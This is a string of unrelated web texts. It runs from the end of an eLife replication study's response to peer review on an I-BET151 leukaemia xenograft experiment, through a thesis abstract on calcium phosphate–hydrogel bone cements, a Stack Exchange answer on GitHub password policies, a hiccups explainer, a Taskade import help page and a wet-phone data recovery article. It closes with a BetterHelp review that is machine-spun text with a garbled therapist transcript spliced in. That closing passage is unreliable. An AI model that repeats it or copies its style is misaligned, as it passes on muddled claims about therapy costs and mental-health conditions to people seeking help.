clarification and issues raised in the reviews. Specifically, for the possibility raised by reviewer #1, we included this possibility in an additional paragraph after describing the results of the in vivo experiment. Specific examples of places where clarification is in order are given below, as well as some additional suggestions, which have been extracted from the reviews: Reviewer #1: From a reader's perspective there is too much emphasis on the statistical testing performed and not enough discussion about the results and how variations to the original study should be interpreted. For experiments 1) and 2) the general results obtained very much led to the same conclusion. In experiment 1) however, although there was, as previously, a marked difference in sensitivity between MV4;11 (IC50 9 nM) and K562 (unmeasurable), the meta-analysis demonstrated poor reproducibility between the concentrations in the original and reproduced experiments for MV4:11 (IC50 of 26 nM previously). The main area of discrepancy relates to 3) the in vivo mouse experiment and specifically the efficacy study assessing overall survival. There are a number of methodological aspects of this study that differ substantially to the original study and these are not raised in the Abstract nor discussed adequately in the manuscript. Therapeutically, the dose of the drug was different (less, at 20 vs 30 mg/kg) as was the duration of therapy, with treatment starting at d35 instead of d21 as in the previous study. As disease activity was determined by examination of peripheral blood only and we know that this xenograft model gives disseminated disease, one interpretation could be that the results differed as a lower dose was used in the face of an increased disease bulk. Most importantly technically, the conditioning regime used was markedly different. 30mg/kg of Busulfan is a very different approach to the more conventional strategy of sub-lethal irradiation performed in the original study. The conditioning regime can dramatically alter engraftment kinetics and also the natural history of the disease. This is reflected in this particular case by the fact that one quarter of the mice on this study developed 'solid malignancies', which I assume to be extramedullary leukaemia. Furthermore 3/12 mice treated with I-BET developed gastrointestinal bloating and (whilst not explicitly described) presumably died for reasons that were independent of the leukaemia burden. This is alluded to by the authors when they state that "animal health issues were observed beyond the anticipated disease presentation of this model" but could be stressed more. These important issues impact significantly on an efficacy study that is essentially measuring all cause mortality. The fact that the reduction in disease burden following IBET treatment closely paralleled the findings reported in the original study yet a survival benefit was not observed here raises the possibility that leukaemia related mortality was not the primary cause for the mortality observed in at least some animals in the IBET treatment arm. All of the above differences would also explain the apparently contradictory finding that, although survival was not impacted, disease bulk was consistently less in the IBET treated arm. A significant issue with the manuscript as currently presented is that the reader is left unaware of these critical details when reading the reproduction. It is essential to communicate this both in the Abstract, in the Results section and when discussing the discrepant results. We agree that there are many aspects a reader needs to consider when interpreting this study, just like any individual study. We have revised the manuscript to include the points raised here, specifically including discussion on the deviation in dose and conditioning used and the impact this could potentially have had on engraftment kinetics, disease progression, and determining survival benefit. We have also clarified in the text that the gastrointestinal bloating was observed at the time of sacrifice and expanding discussion about the solid tumors, which as this review suggests is likely extramedullary disease. The results from the MTD study show that the mice in the 30mg/kg arm had the greatest variation in starting weight amongst all the cohorts. There is a 25% variation in weight between the heaviest and lightest mouse in this cohort whereas the starting weight of the mice in the other cohort's vary very little. The initial weight of the mice can contribute substantially to the observed toxicity of any intervention especially conditioning. This variation may be one of the reasons why more toxicity was observed in this cohort. We agree that variation in the initial weight of the mice could be a reason for observed toxicity, but in the case of the 30 mg/kg cohort, the lightest mouse did not have any observed weight loss throughout the course of the MTD study or have a health monitoring score that justified euthanasia. The remaining four mice had weights with variation similar to the other cohorts; however two of those mice had to be euthanized, which defined the MTD for the study. Reviewer #2: The summary assessment of each experiment is not consistently written it states 'did not find a statistically significant' but the converse is not stated, i.e. 'we did see a statistically significant'. The summary needs to be consistent. This replication study has been powered from a statistical perspective so this needs to be clear in the Abstract. We have revised the Abstract to provide a balanced summary assessment. We included ‘statistically significant’ for the BCL2 expression analysis, since we followed through on the confirmatory analysis that was powered from a statistical perspective. However, we did not revise the analysis of IC50 values since this was an exploratory analysis. Reviewer #3: Most experiments reproduce key results of the original study, with the exception of in-vivo treatment studies in the MV4;11 AML xenograft model, where the authors only reproduce the impact on disease burden while impact on overall survival has been observed. For the interpretation of these results it should be noted that the replication study diverged from the original work in several experimental details that might be of relevance. Overall, the following major points should be considered prior to publication: In the replication of MV4;11 xenograft experiments several experimental conditions deviate from the original study. Most likely due to a lack of access to an irradiation unit, the authors conditioned NOD/SCID mice with a single dose of busulfan (30 mg/kg i.p. 24 hrs prior to MV4;11 transplantation), which has been reported to lead to comparable engraftment of human CD34+ cord blood cells. Apart from the difference in cell type, the original study by Robert-Richard et al. mainly used other dosing regimens (35 mg/kg 36 hrs prior to injection; or 2 x 25 mg 48/24 hrs prior to injection), which they found to be less toxic. While under these conditions, busulfan and irradiation performed similar in human CD34+ HSC engraftment, one cannot conclude that the used regimen has no impact on the in-vivo growth of MV4;11 AML cells (which, for example, are likely to have a much higher proliferation rate than CD34+ HSCs). In fact, another study (Saland et al., 2015) has documented significant differences in the growth of xenografted MV4;11 cells following irradiation vs. busulfan (20 mg/kg). Although the use of NSG and a lower busulfan dose does not allow for direct conclusions for the present study, these results illustrate how sensitive xenograft models are to conditioning regimens. As most prominent difference, after busulfan conditioning the MV4;11 model turned out to be much delayed compared to the original study, which might be explained by insufficient immunosuppression, toxicity of busulfan or its metabolites on MV4;11 cells, or other experimental differences (which the authors partially summarize in their Discussion). Beyond reducing the overall aggressiveness of the model (and, potentially, promoting a high incidence of xenograft-derived solid tumors, which has been observed by the authors), these altered experimental conditions may also impact the in-vivo responsiveness of MV4;11 cells to I-BET151, which should be discussed. This seems particularly important, since busulfan conditioning is still quite uncommon and the used regimen (30 mg/kg 24 hrs prior to injection) has neither been tested in MV4;11 cells, nor has it been evaluated regarding its impact on treatment responsiveness. We have revised the manuscript to include the points raised in here, specifically including discussion on the deviation in the conditioning used and the impact this could potentially have had on engraftment kinetics, disease progression, and responsiveness of the MV4;11 cells to I-BET151, especially considering the impact busulfan has on this model is not fully understood. Beyond changing the conditioning protocol, the authors (based on general toxicity studies) also decided to reduce the I-BET151 dose from 30 mg/kg to 20 mg/kg. While this seems reasonable for the specific experiment, the cause for the observed toxicity remains unclear and may (again) be related to the conditioning regimen. Most importantly, the use of a different dosing regimen on its own provides a possible explanation for reduced drug effects in the MV4;11 xenograft model. In fact, in recent work the authors of the original study show that reducing I-BET151 to 10 mg/kg has no impact on survival in this model (Gilan et al., Figure 3A). Overall, it cannot be assumed that the drug batch was simply more active and, therefore, needed to be reduced to achieve comparable in-vivo activities. While differences in drug batches should always be considered, the reduced tolerability might be due to the used conditioning regimen, and the differences in survival might simply be a consequence of the reduced I-BET151 dose used in this study. We agree that changing the dose of I-BET151 could impact the efficacy of the drug independent of the impact other experimental factors might have as well. We have revised the manuscript to highlight this and discuss it in context of other work by authors of the original study who recently reported I-BET151 administered at 10 mg/kg had no impact on survival in a MLL-AF9 leukemia mouse model (Gilan et al., 2016), while I-BET151 administered at 15 mg/kg did provide a survival benefit in a mouse model of NPM1c AML, albeit with a smaller effect size (Dawson et al., 2014). Overall, changes in the conditioning regimen and the use of a lower dose of I-BET151 may substantially alter the in-vivo response of MV4;11 cells and provide (independent) possible explanations for the observed reduction in in-vivo drug activity. In light of these concerns, it seems very important to not give the wrong impression that the xenograft experiments of the original study could not be reproduced, which would easily be the take-home-message after a "superficial read" of the current manuscript. To avoid this impression, the authors should clearly highlight the most relevant deviations from the original study (i.e. the alternative conditioning regimen and the reduced I-BET151 dose) in the Abstract. Moreover, these experimental differences should also be discussed more extensively in the Discussion. In the current Discussion, the authors first raise some uncertainties due to missing experimental details, then summarize consistent conditions, and then transition into various possible differences that are hard to control for (which are certainly relevant; differences in MV4;11 culture conditions such as different FBS batches could be added). However, for a comprehensive discussion it seems very adequate to first summarize consistent conditions, then highlight obvious and important differences in experimental design (i.e. different conditioning and different drug dose), and only then discuss additional factors that are not easy to control for. We have revised the Abstract to reflect the most relevant deviations between this replication attempt and the original study. We have also reordered the experimental differences as suggested and included these deviations and expanded discussion on how they might alter the outcome in the main text. In summary, the design and execution of this replication study is of high quality, and all necessary changes to the original protocol have been implemented in the best possible way. However, the changes in the design of the xenograft study are substantial and might fully explain the observed differences in in-vivo effects of I-BET151. Due to these differences, the results of the performed xenograft experiments are not fully conclusive with respect to the reproduction of the original study, which should be highlighted more clearly. We agree that there are many aspects a reader needs to consider when interpreting this study, just like any individual study and have revised the manuscript to address the points raised in these reviews. https://doi.org/10.7554/eLife.25306.015 Article and author information Author details 1. Xiaochuan Shan University of Pennsylvania, Perelman School of Medicine, Stem Cell and Xenograft Core, Philadelphia, United States Contribution XS, Acquisition of data, Drafting or revising the article Competing interests XS: Stem Cell and Xenograft Core, University of Pennsylvania, Perelman School of Medicine is a Science Exchange associated lab. 2. Juan Jose Fung ProNovus Bioscience, LLC, Mountain View, United States Contribution JJF, Acquisition of data, Drafting or revising the article Competing interests JJF: ProNovus Bioscience, LLC is a Science Exchange associated lab. 3. Alan Kosaka ProNovus Bioscience, LLC, Mountain View, United States Contribution AK, Acquisition of data, Drafting or revising the article Competing interests AK: ProNovus Bioscience, LLC is a Science Exchange associated lab. 4. Gwenn Danet-Desnoyers University of Pennsylvania, Perelman School of Medicine, Stem Cell and Xenograft Core, Philadelphia, United States Contribution GD-D, Acquisition of data, Drafting or revising the article Competing interests GD-D: Stem Cell and Xenograft Core, University of Pennsylvania, Perelman School of Medicine is a Science Exchange associated lab. 5. Reproducibility Project: Cancer Biology Contribution RP:CB, Analysis and interpretation of data, Drafting or revising the article For correspondence 1. tim@cos.io 2. nicole@scienceexchange.com Competing interests RP:CB: EI, NP: Employed by and hold shares in Science Exchange Inc. The other authors declare that no competing interests exist. 1. Elizabeth Iorns, Science Exchange, Palo Alto, United States 2. Alexandria Denis, Center for Open Science, Charlottesville, United States 3. Stephen R Williams, Center for Open Science, Charlottesville, United States 4. Nicole Perfito, Science Exchange, Palo Alto, United States 5. Timothy M Errington, Center for Open Science, Charlottesville, United States Funding Laura and John Arnold Foundation • Reproducibility Project: Cancer Biology The funder had no role in study design, data collection and interpretation, or the decision to submit the work for publication. Acknowledgements The Reproducibility Project: Cancer Biology would like to thank Dr. Mark Dawson (Peter MacCallum Cancer Centre) for sharing critical information and the following companies for generously donating reagents to the Reproducibility Project: Cancer Biology; American Type and Tissue Collection (ATCC), Applied Biological Materials, BioLegend, Charles River Laboratories, Corning Incorporated, DDC Medical, EMD Millipore, Harlan Laboratories, LI-COR Biosciences, Mirus Bio, Novus Biologicals, Sigma-Aldrich, and System Biosciences (SBI). Ethics Animal experimentation: All animal procedures were approved by the University of Pennsylvania Stem Cell and Xenograft Core IACUC# 803506 and were in accordance with the University of Pennsylvania policies on the care, welfare, and treatment of laboratory animals. Reviewing Editor 1. Karen Adelman, Harvard University, United States Publication history 1. Received: January 23, 2017 2. Accepted: May 22, 2017 3. Version of Record published: June 27, 2017 (version 1) 4. Version of Record updated: January 8, 2018 (version 2) Copyright © 2017, Shan et al. This article is distributed under the terms of the Creative Commons Attribution License, which permits unrestricted use and redistribution provided that the original author and source are credited. Metrics • 1,980 Page views • 153 Downloads • 6 Citations Article citation count generated by polling the highest count across the following sources: Scopus, PubMed Central, Crossref. Download links A two-part list of links to download the article, or parts of the article, in various formats. Downloads (link to download the article as PDF) Download citations (links to download the citations from this article in formats compatible with various reference manager tools) Open citations (links to open the citations from this article in various online reference manager services) Further reading 1. Cancer Biology Edited by Roger J Davis et al. Collection Updated Investigating reproducibility in preclinical cancer research.
18277 2019 eng doctoralthesis 1 2019-06-22 -- 2019-06-07 Development of Dual Setting Cement Systems as Composite Biomaterials with Ductile Properties Entwicklung dual härtender Zemente als Komposit-Biomaterialien mit duktilen Eigenschaften Synthetic bone replacement materials have their application in non-load bearing defects with the function of (re-)construction or substitution of bone. This tissue itself represents a biological composite material based on mineralized collagen fibrils and combines the mechanical strength of the mineral with the ductility of the organic matrix. By mimicking these outstanding properties with polymer-cement-composites, an imitation of bone is feasible. A promising approach for such replacement materials are dual setting systems, which are generated by dissolution-precipitation reaction with cement setting in parallel to polymerization and gelation of the organic phase forming a coherent hydrogel network. Hereby, the high brittleness of the pure inorganic network was shifted to a more ductile and elastic behavior. The aim of this thesis was focused on the development of different dual setting systems to modify pure calcium phosphate cements’ (CPCs’) mechanical performance by incorporation of a hydrogel matrix. A dual setting system based on hydroxyapatite (HA) and cross-linked 2-hydroxyethyl methacrylate (HEMA) via radical polymerization was advanced by homogenous incorporation of a degradable cross-linker composed of poly(ethylene glycol) (PEG) as well as poly(lactic acid) (PLA) with reactive terminal methacrylate functionalities (PEG-PLLA-DMA). By integration of this high molecular weight structure in the HEMA-hydrogel network, a significant increase in energy absorption (toughness) under 4-point bending testing was observed. An addition of only 10 wt% hydrogel precursor (referred to the liquid phase) resulted in a duplication of stress over a period of 8 days. Additionally, the calculated elasticity was positively affected and up to six times higher compared to pure HA. With a constantly applied force during compressive strength testing, a deformation and thus strain levels of about 10 % were reached immediately after preparation. For higher degradability, the system was modified in a second approach regarding organic as well as inorganic phase. The latter component was changed by brushite forming cement that is resorbable in vivo due to solubility processes. This CPC was combined with a hydrogel based on PEG-PLLA-DMA and other dimethacrylated PEGs with different molecular weights and concentrations. Hereby, new reaction conditions were created including a shift to acidic conditions. On this ground, the challenge was to find a new radical initiator system. Suitable candidates were ascorbic acid and hydrogen peroxide. that started the polymerization and successful gelation in this environment. These highly flexible dual set composites showed a very high ductility with an overall low strength compared to HA-based models. After removal of the applied force during compressive strength testing, a complete shape recovery was observed for the samples containing the highest polymeric amount (50 wt%) of PEG-PLLA-DMA. Regarding phase distribution in the constructs, a homogenously incorporated hydrogel network was demonstrated in a decalcifying study with ethylenediaminetetraacetic acid. Intact, coherent hydrogels remained after dissolution of the inorganic phase via calcium ion complexation. In a third approach, the synthetic hydrogel matrix of the previously described system was replaced by the natural biopolymer gelatin. Simultaneously to brushite formation, physical as well as chemical cross-linking by the compound genipin was performed in the dual setting materials. Thanks to the incorporation of gelatin, elasticity increased significantly, in which concentrations up to 10.0 w/v% resulted in a certain cohesion of samples after compressive strength testing. They did not dissociate in little pieces but remained intact cuboid specimens though having cracks or fissures. Furthermore, the drug release of two active pharmaceutical ingredients (vancomycin and rifampicin) was investigated over a time frame of 5 weeks. The release exponent was determined according to Korsmeyer-Peppas with n = 0.5 which corresponds to the drug liberation model of Higuchi. A sustained release was observed for the antibiotic vancomycin encapsulated in composites with a gelatin concentration of 10.0 w/v% and a powder-to-liquid ratio of 2.5 g/mL. With respect to these developments of different dual setting systems, three novel approaches were successfully established by polymerization of monomers and cross-linking of precursors forming an incorporated, homogenous hydrogel matrix in a calcium phosphate network. All studies showed an essential transfer of mechanical performance in direction of flexibility and bendability. Synthetische Knochenersatzmaterialien finden ihre Anwendung im Bereich nicht lasttragender Defekte zum Wiederaufbau und Ersatz von defekter oder verlorener Knochensubstanz. Diese stellt aufgrund ihres Aufbaus aus mineralisierten Kollagen-Fibrillen selbst ein biologisches Komposit-Material dar, welches die mechanische Festigkeit des Minerals mit der Duktilität der organischen Matrix kombiniert. Eine Nachahmung dieser herausragenden Eigenschaften des Knochens wird im Sinne eines Ersatzmaterials durch geeignete Polymer-Zement-Komposite ermöglicht. Ein vielversprechender Ansatz für solche Komposite sind hierbei dual härtende Systeme, bei denen die Lösungs-Fällungs-Reaktion der Zementbildung parallel zur Polymerisation oder Gelierung der organischen Phase zu einem kohärenten Hydrogelnetzwerk abläuft. Die hohe Sprödigkeit und Bruchanfälligkeit rein anorganischer Netzwerke sollte dabei durch die Integration elastischer Polymerkomponenten hin zu mehr Flexibilität und Elastizität modifiziert werden. In der vorliegenden Arbeit wurden verschiedene dual härtende Hybrid-Materialien entwickelt, um etablierte Calciumphosphatzemente durch Einbringen von zusätzlicher Hydrogel-Matrizes bezüglich ihrer mechanischen Eigenschaften zu modifizieren. In ein dual härtendes System aus Hydroxylapatit (HA) und radikalisch vernetztem 2-Hydroxyethlymethacrylat (HEMA), wurde ein abbaubarer Cross-linker aus Polyethylenglykol (PEG) und Polymilchsäure (PLA)-Einheiten homogen inkorporiert, der mittels einer Reaktion der terminalen Methacrylatfunktionen (PEG-PLLA-DMA) zur Ausbildung der Vernetzungen führte und mittels PLLA hydrolytisch labile Esterbindungen ins System integrierte. Durch Einbringen dieser hochmolekularen Polymere in das engmaschige HEMA-Hydrogelnetzwerk kam es zu einer signifikanten Erhöhung der Energieaufnahme des Konstruktes unter 4-Punkt-Biegebelastung im Vergleich zum bereits etablierten System. Durch Zusatz von 10 Gew% hochmolekularem Hydrogel Präkursor (bezogen auf die flüssige Phase) konnte über einen Zeitraum von acht Tagen ein zweifach höherer Bruchwiderstand erhalten werden, verbunden mit einer bis zu sechsfach höheren Elastizität gegenüber reinem HA Zement. Zur Steigerung der Bioabbaubarkeit wurde in einem zweiten Ansatz durch Austausch der anorganischen Komponente mit einem in vivo leichter resorbierbaren Bruschit Zement das dual härtende System modifiziert. Dabei wurden dimethacrylierte PEGs verschiedener Molekulargewichte in unterschiedlichen Konzentrationen mit dem Zementpulver kombiniert. Die Reaktionsbedingungen im sauren Milieu erforderten den Austausch des radikalischen Initiator-Systems, wobei sich eine Kombination aus Ascorbinsäure und Wasserstoffperoxid als geeignet erwies. Die so erhaltenen dual härtenden Komposite zeigten eine sehr hohe Duktilität und Flexibilität bei insgesamt niedriger Festigkeit im Vergleich zu HA-basierenden Systemen. So fand im Druckversuch eine vollständige Relaxation zu den Ausgangsabmessungen des Prüfkörpers bei einem hohen Polymeranteil an PEG-PLLA-DMA (50 Gew%) statt. Die homogene Verteilung der inkorporierten Polymerphase wurde mittels Decalcifizierung durch Ethylendiamintetraessigsäure bewiesen. Hierbei wurden durchgängige Hydrogele nach Herauslösen der anorganischen Phase durch Komplexierung von Calcium-Ionen erhalten. Abschließend wurde die auf synthetischen Polymeren basierende Hydrogel-Matrix durch das natürliche Biopolymer Gelatine ersetzt. Neben der Bruschit-bildenden Zement-Reaktion wurde das Polymernetzwerk sowohl durch eine physikalische Gelierung als auch eine chemische Vernetzung mit Genipin stabilisiert. Durch die zusätzliche organische Phase wurden die Eigenschaften des Zementes hinsichtlich Elastizität erhöht, wobei bei einer Gelatine-Konzentration von 10,0 Gew% eine erneute Kohäsion der Prüfkörper nach mechanischer Druckbelastung beobachtet werden konnte. Diese zerfielen nicht in einzelne Teile, sondern wurden trotz Auftreten von Rissen als weitestgehend intakte Quader zusammengehalten. Weiterhin wurde die Wirkstoff-Freisetzung zweier antibiotisch aktiver Substanzen (Vancomycin und Rifampicin) über einen Zeitraum von fünf Wochen untersucht. Mittels Bestimmung des Freisetzungsexponenten nach Korsmeyer-Peppas konnte eine verzögerte Wirkstoffliberation für das Antibiotikum Vancomycin gemäß Wurzel-t-Kinetik (Higuchi-Modell) mit n = 0,5 für ein Pulverflüssigkeitsverhältnis von 2,5 g/mL bei einer Gelatinekonzentration von 10,0 Gew% erhalten werden. Im Hinblick auf die Entwicklung verschiedener Formulierungen als dual härtende Systeme wurden in der vorliegenden Arbeit drei Varianten etabliert, die durch Polymerisation von Monomeren beziehungsweise Hydrogel-Präkursoren zu einer inkorporierten, homogenen Hydrogel-Matrix im Calciumphosphatnetzwerk führten. Bei allen Ansätzen wurde ein wesentlicher Transfer der mechanischen Eigenschaften in Richtung Flexibilität und Biegsamkeit erzielt. urn:nbn:de:bvb:20-opus-182776 10.25972/OPUS-18277 X 128225 Deutsches Urheberrecht mit Print on Demand Michaela Rödel deu swd Calciumphosphatzemente deu swd Knochenzement deu swd Hydrogel eng uncontrolled Dual setting system eng uncontrolled Ceramic polymer composite Chemie und zugeordnete Wissenschaften open_access Abteilung für Funktionswerkstoffe der Medizin und der Zahnheilkunde Universität Würzburg Universität Würzburg https://opus.bibliothek.uni-wuerzburg.de/files/18277/Roedel_Michaela_Dissertation.pdf
Take the 2-minute tour × Web Applications Stack Exchange is a question and answer site for power users of web applications. It's 100% free, no registration required. I am concerned to let any team member in with a weak password on my dev team but I do not see a way to enforce that as a requirement in GitHub. Is this possible? The concern is that a team members account gets hacked and then private source code becomes accessible to the world or competitors. share|improve this question migrated from superuser.com Aug 4 '11 at 14:28 This question came from our site for computer enthusiasts and power users. add comment 1 Answer 1 GitHub does not provide any way to set custom password policies; all accounts are independent. (Implementing such support would require the passwords to be stored in a plaintext/decryptable form, which is even worse for security.) You could set up your own Git server – using Gitolite if you need detailed access control, but even pushing over plain SSH would allow you to set up your own policies. GitHub being Git, however, it's next to impossible to do any permanent damage to the data – every team member has a copy of the entire version history. share|improve this answer add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service.
Hiccups: why do we hiccup? Most of us have experienced hiccups, an uncomfortable, sometimes embarrassing, but usually short-lived experience. But sometimes hiccups persist for a long period of time and can be a sign of serious underlying disease. What are hiccups? Hiccups are bursts of inspiratory (breathing in) activity. The muscles we use when we take in a breath are the intercostal muscles situated between the ribs, and the diaphragm — a sheet of muscle below the lungs. A hiccup is an involuntary contraction of the diaphragm, which is followed by the sudden closure of your vocal cords – this produces the characteristic hiccup sound. Causes of hiccups Hiccups are very common and most people will have hiccups at some time. Most simple cases of hiccups come after eating or drinking too much or too quickly. The stomach, which is situated right below the diaphragm, becomes distended and irritates it. This will cause the diaphragm to contract, as it does when we breathe in. Carbonated fizzy drinks can cause hiccups, and alcohol is another common cause of hiccups. Excess smoking may also cause hiccups. Hot and spicy food, such as curry, may trigger hiccups. Sometimes hiccups will occur because of a disturbance to the nerve pathways from the brain to the muscles involved. This explains why hiccups may occur with temperature changes or emotional situations. It is also the reason that a sudden shock can sometimes abolish an attack. Persistent hiccups may signify problems in the brain (such as stroke, tumours, infections or multiple sclerosis), spinal cord or any of the structures around the diaphragm or chest wall. So chronic hiccups that last days, months or even years, may indicate serious underlying disease and should be investigated. Treatment Everyone has their own pet remedy for curing hiccups. Simply holding your breath is often effective for short-term bouts of hiccups, but usually they will go away of their own accord. Some people find that touching or gently lifting their uvula (the dangly structure at the back of the throat) with a cotton bud or similar will stop a bout of hiccups, but be aware that this will stimulate the gag reflex. Other methods include drinking ice cold water, swallowing something sweet like a spoonful of sugar, or sitting down, while leaning forward and pulling your knees up to compress your chest. If you have hiccups that have gone on for 2 days or longer, or are having recurrent bouts of hiccups, you should see a doctor to find out if there is an underlying cause that needs treating. What your doctor can do for you If you are having problems with hiccups, your doctor can: • rule out serious underlying diseases that provoke hiccups; • prescribe antispasmodics; • treat underlying diseases that may be causing hiccups; or • refer you to a surgeon who may recommend surgery on the nerves supplying the diaphragm, if you have severe or persistent hiccup attacks. References 1. Patient.co.uk. Hiccups (hiccoughs). Last checked June 2011. http://www.patient.co.uk/health/hiccups-hiccoughs (accessed Aug 2013). 2. Mayo Clinic. Hiccups. Last reviewed June 2011. http://www.mayoclinic.com/health/hiccups/DS00975 (accessed Aug 2013). YOU MAY ALSO LIKE Receive the latest news Subscribe To Our Weekly Newsletter Get notified about new articles
Skip to main content Import from OneNote Import OneNote content into Taskade to streamline your notes and tasks. Updated this week Export a Notebook from OneNote 1. In My Notebooks, right-click the notebook you want to export. 2. Click Export notebook ➡ Export. 3. Choose a location and save the file. 4. The notebook will be saved in Zip file format. Import to Taskade 1. Click the ➕New project button in your workspace / folder. 2. Choose Import and Summarize Document with AI. 3. Unzip the downloaded notebook. 4. Drag your PDF files into the pop-up menu or click to select files. 5. Click ➕Create Project to create a new project. csv-convert.gif 😊 Helpful Links Did this answer your question?
skip to Main Content Call now to speak to a Data Recovery Advisor. Receive a data recovery quote, free shipping, and a free evaluation. If the data is unrecoverable, there is no charge for our service. Wet Phone Rice Trick: To Rice or Not to Rice? How many people do you know that have dropped their phone in water? Chances are you know at least two or three. If the data on a water-logged phone is backed up, then the data is safe. Just buy another phone, restore data from the backup and the new phone is good to go. No backup? Well…that’s different. If the smartphone won’t turn on, you can buy a replacement, forget about the contents and start making backups for your new information. However, if the data is important, you need to find someone to help. And this needs to be done quickly or the loss will become permanent. WHAT HAPPENS INSIDE A WET PHONE? There are three types of major internal components that can be damaged. The capacitors, resistors and integrated circuits (ICs) including the memory chip are all mounted on the printed circuit board (PCB) inside the phone. There are hundreds of these components—some so tiny they cannot be seen with the naked eye. Work must be done under a high-power microscope. For example, there are 760 capacitors in an iPhone 6 and every one of them is subject to failure, affecting the operation of the device. There are also thousands of solder connections that can and will be affected by corrosion. The process of checking each connection is complex but important in order to learn the magnitude of the problem and also to identify what parts need to be manipulated in the lab. THE NEED FOR SPEED Speed is really of the essence. Even just a few days can make a big difference in the final outcome. Each story is different and there is no prescribed formula for the advance of corrosion on a device. It’s hard to estimate how quickly a phone’s components will break down, but the quicker we can get the device, the better our chances of a good recovery. You need an experienced data recovery service, like DriveSavers, to work on a wet phone. The longer it takes to start the work, the greater the chance of losing everything important on the water-damaged device. The idea is to slow down any corrosion before permanent data loss occurs. STEP ONE: CUT THE POWER If you are able to remove the battery from your water-damaged phone, that is the first thing you should do. An electric charge from the battery could cause more rapid corrosion of the phone’s memory, data circuits and other flash components. If the battery is not meant to be removed from the phone, do not attempt to do so. Opening the sealed device may cause further damage. Never try to charge a water-damaged phone or attempt to restart it once it fails. Introducing an electronic charge in the device when it’s wet could actually speed up the corrosion process and make matters worse. STEP TWO: BAG IT AND TAG IT Dry the outside of the wet device with a dry towel, put it in a ziplock bag and seal it. Do not add any additional liquids to the bag. By maintaining the current moisture level, we can slow the advance of corrosion that—over time—will destroy the phone’s components. WHAT ABOUT RICE? Despite any “Internet” guidance to the contrary, do not put the device in a bag of rice. I hear people say all the time “how long do you leave a wet phone in rice”. If your phone has been submerged in water, that water has found its way into every nook and cranny. That’s what liquid does—it flows into any open space it can access. Putting your phone into a drying agent like rice will only work to absorb water on the surface of your phone and close to the surface. It will not reach those little nooks and crannies between the metal components and connections that make your phone work. In addition, the epoxy that holds the electronics in place within your phone will retain moisture and will not fully dry from this method. In addition, rice naturally has dust and grime on it that usually makes its way into the device. It can gunk up the components just like corrosion does. In fact, we see many devices with actual grains of rice still inside the enclosure. If the phone does initially turn on after trying the rice trick, don’t expect it to function for long. The hidden moisture will work to corrode metal connections and sooner or later (likely sooner) your phone will fail permanently. Once enough corrosion has occurred, no trick in the book, amateur or professional, will work to bring back your phone or anything you have on it. Your pictures and videos, your contacts, your notes—all lost forever. If the rice does manage to dry out your phone enough for it to work temporarily, you can at least use that time to transfer all of your important data to another device before it is gone for good. However, if you power up your phone when it has not sufficiently dried out, you will likely short out the circuitry of your phone, essentially frying its components and reducing the chances of saving your data to less than 10%. Should you leave the phone in rice for a longer period of time? No, as this just gives the hidden moisture more time to corrode the inner workings, which may also permanently destroy the phone and any data stored on it. PREVENT DATA LOSS FROM WATER Clearly, the first suggestion is for you to backup your data. No matter what precautions you take, you never really know what the future may hold. If the data on your phone is important to you, back it up to at least two places. For example, a computer and the cloud. There are all kinds of accessories meant to protect your phone from water damage. These include waterproof cases, bags and other containers. You could also purchase a water resistant phone, although you should probably avoid contact with water even with these. Whatever path you choose to protect your photos, videos, contacts and other data, DriveSavers is here to help in any type of data loss situation. Call 24/7 at 800.440.1904. Back To Top Search
Get Better Help Gabbie Online – Answers Inside the answer to Better Help Gabbie…Gone are the days when a costly in-office session with a therapist was the only way to get assistance. Online treatment is now one of the leading methods individuals receive specific, couples, and group counseling. Not only is it frequently easier, but it’s also a more comfortable setting for lots of clients. Thankfully, online platforms like BetterHelp make it more hassle-free to seek assistance. Keep checking out to discover out how we evaluated it on the vital considerations for quality online treatment. How much will BetterHelp therapy expense? How do the expenses compare to what you ‘d pay for rivals’ services or for standard, in-person treatment?   Just how much does BetterHelp cost per month? Costs compare positively both to in-person treatment and to measuring up to services, especially when you consider the worth of weekly live sessions included for every subscriber (not just available at a premium rate). Nevertheless, pricing information on the website is more opaque than we ‘d prefer; generally, you wouldn’t understand your likely expenses prior to finishing the survey unless you’ve read our evaluation here initially. We’ll set out the essential prices information and elements below so that you can comprehend BetterHelp’s range of possible costs and discount options. hi my name is hey sue and today we’re gon na be speaking about high working anxiety so for those of you that are actually acquainted with mental health and some of the conditions that we can discover in the DSM you might understand this as dysthymia so we’re gon na talk a little bit more about indications that you could be trying to find whether you might be experiencing high operating depression or someone that you know and appreciate is going through this obstacle and battle so initially let’s think of anxiety in general when you think of somebody that’s depressed what comes to mind for me I’m thinking of somebody that has a hard time rising has a difficult time leaving their home perhaps they’ve disliked things they used to actually take pleasure in like hobbies or particular types of food restaurants things that they liked to do with their leisure time maybe they’re not actually so good at preserving relationships with their household their friends maybe they have actually lost their job because they have actually lost inspiration and this will in this drive to live their life so on the flip side let’s consider people in your life that are very high-functioning you may have a co-worker for example or have had a co-worker that appears to somehow manage to get up early every day prior to work to work out maintains Insurance coverage also will not be an option. Unless you have fantastic insurance coverage with a low deductible, the cost of therapy will likely be an excellent worth to you compared to alternatives. Client care and personal privacy Grade: 9 How does BetterHelp stack up? What steps does BetterHelp take to secure your sensitive information? In a nutshell, BetterHelp is committed to security, quality, and personal privacy– and it shows. Since BetterHelp doesn’t work with insurance or companies, there isn’t even a standard level of information-sharing in between such entities, which implies maximum privacy for you. What is the BetterHelp controversy? Better Help Gabbie   BetterHelp is the largest online treatment platform worldwide. Online therapy platforms like BetterHelp strive to provide a simpler, more comfortable, and more cost effective method to get help. The need for online treatment has skyrocketed in the last couple of years. According to the CDC, 40% of American adults experienced psychological health or substance abuse issues throughout the coronavirus pandemic. It took a substantial toll on more youthful adults, essential workers, people of color, and caretakers. While online therapy ended up being the only alternative for most throughout this time, positive experiences helped lots of people recognize that it’s a practical choice in a post-pandemic world, too. Everyone can benefit from talking with a therapist. Everybody deals with barriers in life that can obstruct of our happiness or end up being roadblocks to our goals. And often, when goals themselves change, we need assistance browsing and coping with difficult emotions. BetterHelp therapists are all extremely qualified to help you as you look for to enhance your life. The business likewise works with therapists who concentrate on specific locations of concern, including but not restricted to: Depression Stress Stress and anxiety Self-esteem Life modifications Parenting Relationships Faith Sexuality Identity Anger Dependency Eating Sleep PTSD Grief Household dispute Attempt BetterHelp Extra services In addition to specific therapy, the BetterHelp homepage lists Couples and Teenager therapy alternatives. Each of these services sends you to a sibling site when selected– Regain.us for couples and TeenCounseling.com for teenagers. Rates for these services resembles BetterHelp, and all therapists satisfy the same high standards and go through the same 